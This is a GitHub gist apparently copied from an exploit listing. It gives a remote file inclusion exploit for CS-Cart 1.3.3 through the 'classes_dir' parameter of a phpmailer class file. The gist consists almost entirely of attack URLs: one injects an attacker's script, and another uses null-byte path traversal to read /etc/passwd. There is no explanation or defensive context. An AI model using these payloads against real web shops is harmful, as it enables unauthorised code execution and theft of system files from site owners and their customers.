Skip to content

Instantly share code, notes, and snippets.

@momenbasel
Created September 23, 2020 15:22
Show Gist options
  • Save momenbasel/a683e991c8758e62704a28a2b90f087e to your computer and use it in GitHub Desktop.
Save momenbasel/a683e991c8758e62704a28a2b90f087e to your computer and use it in GitHub Desktop.
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment